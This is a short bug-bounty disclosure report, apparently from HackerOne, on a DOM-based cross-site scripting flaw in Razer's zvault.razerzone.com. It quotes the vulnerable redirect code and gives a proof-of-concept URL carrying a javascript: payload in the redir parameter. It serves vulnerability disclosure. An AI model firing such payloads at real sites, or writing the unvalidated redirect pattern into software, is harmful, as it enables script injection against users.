Razer US: Unauthenticated DOM-based XSS in zvault.razerzone.com via the redir parameter.

2017-09-07T13:42:24
ID H1:266737
Type hackerone
Reporter edoverflow
Modified 2017-11-08T19:39:35

Description

Summary


zvault.razerzone.com is vulnerable to DOM-based XSS via the redir parameter.

{F219081}

{F219082}

Affected Code


```js var redirectUrl = getUrlParameter('redir');

if (isCrossOriginFrame()) { window.location.href = redirectUrl; } else { window.parent.location.href = redirectUrl; } ```

Browsers Verified In


  • Google Chrome 60.0.3112.113 (Official Build) (64-bit)
  • Mozilla Firefox 55.0.2 (64-bit)

PoC


https://zvault.razerzone.com/redir.html?redir=javascript:alert(document.domain)